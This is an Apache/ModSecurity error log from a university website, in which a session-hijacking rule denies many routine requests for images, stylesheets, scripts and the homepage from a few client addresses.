[Mon Aug 28 08:56:54.523167 2023] [:error] [pid 38688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv@5sCo-f0AAJcg6dYAAAAD"]
[Mon Aug 28 08:56:54.523221 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv@5sCo-f0AAJb3RbcAAAAH"]
[Mon Aug 28 08:56:54.527142 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv@5sCo-f0AAJceGN4AAAAA"]
[Mon Aug 28 08:56:54.558741 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv@5sCo-f0AAJb4sXoAAAAL"]
[Mon Aug 28 08:56:54.558744 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv@5sCo-f0AAJb3RbgAAAAH"]
[Mon Aug 28 08:56:54.558826 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv@5sCo-f0AAJbxpBUAAAAJ"]
[Mon Aug 28 08:56:54.558862 2023] [:error] [pid 38688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv@5sCo-f0AAJcg6dcAAAAD"]
[Mon Aug 28 08:56:54.559728 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv@5sCo-f0AAJTiok8AAAAE"]
[Mon Aug 28 08:56:54.559865 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv@5sCo-f0AAJceGN8AAAAA"]
[Mon Aug 28 08:56:54.599511 2023] [:error] [pid 38687] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@5sCo-f0AAJcfLMMAAAAC"]
[Mon Aug 28 08:56:54.599565 2023] [:error] [pid 38641] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv@5sCo-f0AAJbxpBYAAAAJ"]
[Mon Aug 28 08:56:54.600489 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv@5sCo-f0AAJb3RbkAAAAH"]
[Mon Aug 28 08:56:54.600613 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv@5sCo-f0AAJTiolAAAAAE"]
[Mon Aug 28 08:56:54.734896 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@5sCo-f0AAJb4sXsAAAAL"]
[Mon Aug 28 08:57:02.630651 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv@7sCo-f0AAJb4sX0AAAAL"]
[Mon Aug 28 08:57:02.717425 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@7sCo-f0AAJceGOEAAAAA"]
[Mon Aug 28 08:57:03.331905 2023] [:error] [pid 38647] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv@78Co-f0AAJb3RbwAAAAH"]
[Mon Aug 28 08:57:03.339796 2023] [:error] [pid 38686] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv@78Co-f0AAJceGOIAAAAA"]
[Mon Aug 28 08:57:03.346687 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv@78Co-f0AAJdGkh4AAAAF"]
[Mon Aug 28 08:57:03.634291 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv@78Co-f0AAJdGkh8AAAAF"]
[Mon Aug 28 08:57:03.634707 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@78Co-f0AAJcb4@4AAAAP"]
[Mon Aug 28 08:57:03.683037 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv@78Co-f0AAJcg6doAAAAD"]
[Mon Aug 28 08:57:03.698398 2023] [:error] [pid 38647] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv@78Co-f0AAJb3Rb0AAAAH"]
[Mon Aug 28 08:57:03.698875 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv@78Co-f0AAJdGkiAAAAAF"]
[Mon Aug 28 08:57:03.699199 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv@78Co-f0AAJb4sX8AAAAL"]
[Mon Aug 28 08:57:03.917575 2023] [:error] [pid 38114] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv@78Co-f0AAJTiolQAAAAE"]
[Mon Aug 28 08:57:03.918728 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv@78Co-f0AAJdGkiEAAAAF"]
[Mon Aug 28 08:57:03.935909 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv@78Co-f0AAJb4sYAAAAAL"]
[Mon Aug 28 08:57:03.941042 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv@78Co-f0AAJcg6dsAAAAD"]
[Mon Aug 28 08:57:03.952248 2023] [:error] [pid 38686] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv@78Co-f0AAJceGOMAAAAA"]
[Mon Aug 28 08:57:03.963050 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv@78Co-f0AAJcb4@8AAAAP"]
[Mon Aug 28 08:57:04.168280 2023] [:error] [pid 38686] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv@8MCo-f0AAJceGOQAAAAA"]
[Mon Aug 28 08:57:04.183818 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv@8MCo-f0AAJcb4-AAAAAP"]
[Mon Aug 28 08:57:04.193232 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv@8MCo-f0AAJdGkiIAAAAF"]
[Mon Aug 28 08:57:04.214265 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv@8MCo-f0AAJcg6dwAAAAD"]
[Mon Aug 28 08:57:04.215021 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv@8MCo-f0AAJb4sYEAAAAL"]
[Mon Aug 28 08:57:04.375530 2023] [:error] [pid 38686] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv@8MCo-f0AAJceGOUAAAAA"]
[Mon Aug 28 08:57:04.393067 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv@8MCo-f0AAJcb4-EAAAAP"]
[Mon Aug 28 08:57:04.421952 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv@8MCo-f0AAJb4sYIAAAAL"]
[Mon Aug 28 08:57:04.432787 2023] [:error] [pid 38647] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv@8MCo-f0AAJb3Rb8AAAAH"]
[Mon Aug 28 08:57:04.437592 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv@8MCo-f0AAJcg6d0AAAAD"]
[Mon Aug 28 08:57:04.448579 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv@8MCo-f0AAJdGkiMAAAAF"]
[Mon Aug 28 08:57:04.803201 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@8MCo-f0AAJcb4-IAAAAP"]
[Mon Aug 28 08:57:05.014458 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv@8cCo-f0AAJdGkiQAAAAF"]
[Mon Aug 28 08:57:05.123476 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv@8cCo-f0AAJcg6d4AAAAD"]
[Mon Aug 28 08:57:05.237292 2023] [:error] [pid 38648] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv@8cCo-f0AAJb4sYMAAAAL"]
[Mon Aug 28 08:57:05.573216 2023] [:error] [pid 38683] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@8cCo-f0AAJcb4-MAAAAP"]
[Mon Aug 28 08:57:09.568461 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv@9cCo-f0AAJb4sYYAAAAL"]
[Mon Aug 28 08:57:09.595234 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@9cCo-f0AAJcb4-UAAAAP"]
[Mon Aug 28 08:57:18.963805 2023] [:error] [pid 38647] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv@-sCo-f0AAJb3RcUAAAAH"]
[Mon Aug 28 08:57:19.675061 2023] [:error] [pid 38114] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv@-8Co-f0AAJTiolgAAAAE"]
[Mon Aug 28 08:57:24.324422 2023] [:error] [pid 38646] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-BMCo-f0AAJb21EUAAAAB"]
[Mon Aug 28 08:57:24.645364 2023] [:error] [pid 38648] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-BMCo-f0AAJb4sYwAAAAL"]
[Mon Aug 28 08:57:37.688936 2023] [:error] [pid 38646] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-EcCo-f0AAJb21EcAAAAB"]
[Mon Aug 28 08:57:37.983413 2023] [:error] [pid 38114] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-EcCo-f0AAJTiolsAAAAE"]
[Mon Aug 28 08:57:48.322341 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-HMCo-f0AAJcg6eYAAAAD"]
[Mon Aug 28 08:57:48.663004 2023] [:error] [pid 38646] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-HMCo-f0AAJb21EkAAAAB"]
[Mon Aug 28 08:57:51.173302 2023] [:error] [pid 38646] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-H8Co-f0AAJb21EoAAAAB"]
[Mon Aug 28 08:57:51.362264 2023] [:error] [pid 38726] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-H8Co-f0AAJdGkiwAAAAF"]
[Mon Aug 28 08:57:57.229248 2023] [:error] [pid 38641] [client 125.164.19.9] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv-JcCo-f0AAJbxpB0AAAAJ"]
[Mon Aug 28 08:57:57.229605 2023] [:error] [pid 38646] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv-JcCo-f0AAJb21E0AAAAB"]
[Mon Aug 28 08:57:57.342606 2023] [:error] [pid 38648] [client 125.164.21.210] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv-JcCo-f0AAJb4sZQAAAAL"]
